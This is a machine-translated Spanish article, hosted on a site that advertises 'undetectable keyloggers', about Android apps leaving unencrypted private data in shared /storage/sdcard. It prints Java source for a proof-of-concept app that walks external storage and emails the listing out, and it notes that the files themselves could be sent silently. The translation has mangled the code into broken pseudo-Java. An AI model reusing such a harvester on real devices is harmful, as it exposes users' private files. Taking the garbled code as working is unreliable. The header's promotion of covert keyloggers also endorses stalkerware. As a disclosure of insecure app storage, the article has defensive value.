This is a machine translation. The original page (in English) is available here.
Windows
Mac OS
Móvil

Última noticia: 12 de noviembre de 2016 - Hemos encontrado un nuevo indetectable Capturadores de teclado para usted. Feed RSS

Inicio>Artículos>Android desarrolladores de aplicaciones no se preocupan por los usuarios la seguridad de los datos, lo que provoca fugas de datos

AnyKeylogger para Mac

La aplicación de Android de los desarrolladores no se preocupan por los usuarios la seguridad de los datos, lo que provoca fugas de datos

por Habrahabr Usuario

Es un secreto a voces que las aplicaciones de Android son muy vulnerables a las fugas de datos, principalmente debido a que sus desarrolladores. Sin embargo, otro hecho que confirma que fue descrito recientemente en habrahabr.ru - un ruso de recursos, popular entre los expertos, en particular con los desarrolladores de aplicaciones.

En su propio smartphone, el autor del post di cuenta de directorios y archivos de aplicaciones, que por mucho tiempo había sido eliminado, en /storage/sdcard, y se preguntó si una aplicación para Android fue capaz de leer los archivos temporales desde otra aplicación.

Qué archivos temporales y por qué debemos cuidar de ellos? Estos archivos pueden contener sus fotos, registros de llamadas telefónicas, base de datos de sus diarios y un montón de otra información que personalmente considere privada y no quiero ponerla a disposición de todo el mundo.

En Android, los archivos temporales de todas las aplicaciones se almacenan en /storage/sdcard. Cuando una aplicación se eliminan, estas temperaturas siguen siendo - si el desarrollador no se cuidaba para la eliminación de ellos en este caso.

Un administrador de archivos descargados de google.jugar le permitirá leer los archivos temporales de todas las aplicaciones instaladas en el dispositivo Android, incluyendo sin cifrar las grabaciones de las conversaciones telefónicas de los mensajeros y de la telefonía sip aplicaciones, historial de navegación de los navegadores, las listas de reproducción de los jugadores, varios info de las redes sociales, notas personales acerca de cosas que hacer de los diarios, etcétera.

Sólo fantasía: temp archivos de whatsapp, el popular mensajero con más de 33 000 000 de usuarios, también se almacenan en /storage/sdcard; lo que es más, sólo los mensajes son cifrados, las fotos no se. Whatsapp es sólo un ejemplo de muchos, de casi todos los populares aplicaciones de almacenar sus datos personales en /storage/sdcard/%appName% y cualquier otra aplicación tiene acceso a este directorio.

Por ejemplo, este mensajero almacena las fotos enviadas a usted en el directorio accesible para todas las aplicaciones en el dispositivo, que tiene permiso para acceder al almacenamiento de:

Por ejemplo, este mensajero almacena las fotos enviadas a usted sin ningún tipo de cifrado, las imágenes se almacenan en el directorio, la cual es accesible para todas las aplicaciones en el dispositivo, que tiene permiso de acceso al almacenamiento.En el peor de los casos, estos datos pueden ser robados para obtener acceso no autorizado

Y este popular cliente sip tiendas settins de su cuenta sip. En el peor de los casos, estos datos pueden ser robados para obtener acceso no autorizado:

en el peor de los casos, estos datos pueden ser robados para obtener acceso no autorizado

Bien, ¿quiere decir que alguien puede robar fotos de tu dispositivo Android? El autor escribió un bastante pequeño programa en Java que envía estructura de /storage/sdcard a una dirección de correo electrónico especificada.

El código fuente de la aplicación que los correos electrónicos de la estructura de directorio de /storage/sdcard:

-----------------

paquete android.com.testapp;

import android.contenido.La intención;
import android.os.Medio ambiente;
import android.apoyo.v7.app.AppCompatActivity;
import android.os.Paquete;
import android.vista.Vista;
import android.widget.Botón;
import android.widget.EditText;
import android.widget.Brindis;

import java.io.Archivo;
import java.util.Fecha;

public class MainActivity extends AppCompatActivity {
Botón emailButton;
EditText de correo electrónico;

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R. layout.activity_main);

correo electrónico = (EditText) findViewById(R. id.el correo electrónico);
emailButton = (Button) findViewById(R. id.emailButton);
emailButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
getFileStrucure();
}
});
}

protected void getFileStrucure(){
Filewalker fw = new Filewalker();
fw.a pie(Archivo nuevo(medio Ambiente.getExternalStorageDirectory().getAbsolutePath()));
}

clase privada Filewalker {
private int count = 0;
Cadena privada de sked = "";
public void pie de Archivos(root) {
count++;
Archivo[] lista = raíz.listFiles();
para (Archivo f : lista) {
si (f.isDirectory()) {
sked += "hora:" + new Date(f.lastModified()) + ", dir: "+ f.getAbsoluteFile() + "\n";
a pie(f);
}
else {
sked += "hora:" + new Date(f.lastModified()) + ", tamaño: "+ f.length() + ", " + f.getAbsoluteFile() + "\n";
}
}
count--;
if (count == 0) {
sendMail(sked);
}
}
}

protected void sendMail(Cadena de sked) {
Intent i = new Intent(Intent.ACTION_SEND);
yo.setType("message/rfc822");
yo.putExtra(Intent.EXTRA_EMAIL, new String[]{correo electrónico.getText().toString()});
yo.putExtra(Intent.EXTRA_SUBJECT, "android estructura de almacenamiento");
yo.putExtra(Intent.EXTRA_TEXT, sked);
try {
startActivity(Intent.createChooser(i, "Enviar correo electrónico..."));
} catch (android.contenido.ActivityNotFoundException ex) {
Pan tostado.makeText(getApplicationContext(), "no Hay clientes de correo electrónico instalado.", Pan tostado.LENGTH_SHORT).show();
}
}

}

-----------------

Introduzca la dirección de correo electrónico, y la aplicación de los correos electrónicos de la estructura de directorio de /storage/sdcard; como ustedes saben, esto se puede hacer sin una solicitud de correo electrónico y no sólo la estructura de directorios, pero también de los propios archivos pueden ser enviados. Aplicaciones en google.jugar es raro ser revisado cuidadosamente. Por desgracia, esta es una herramienta muy eficaz para los vendedores, ya que ellos siempre quieren saber lo más posible acerca de sus usuarios. No hace falta decir que los datos personales pueden ser obtenidos de esta manera.

Y aquí está la carta que vas a recibir; contiene contenido de /storage/sdcard, es decir, habrá todos los archivos y carpetas de las aplicaciones instaladas en tu dispositivo:

No hay ningún directorios y archivos de aplicaciones de google.el juego, que ha instalado en su dispositivo móvil y el uso de cada día - que es el directorio sdcard de emulador de android.

Ver el directorio /storage/sdcard utilizar cualquier gestor de archivos para android; como una opción, el mismo que está disponible cuando se conecta el dispositivo a un PC /teléfono; si el uso de mensajeros, las redes sociales, un programador de tareas, ver lo que teóricamente puede cualquier desarrollador de android a ver, que escribió android.el permiso.READ_EXTERNAL_STORAGE en el manifiesto.

Así, la conclusión es clara: muchos de los que desarrollan aplicaciones como redes sociales, mensajería instantánea, telefonía sip clientes, diarios, no se preocupan por la seguridad de los datos de los usuarios.
Leer el artículo completo
Inicio>Artículos>Android desarrolladores de aplicaciones no se preocupan por los usuarios la seguridad de los datos, lo que provoca fugas de datos
IMPORTANTE! Instalación de equipo de monitoreo de herramientas en los equipos que no posean o no tienes permiso para monitor puede violar locales, estatales o federales.
Suggest translation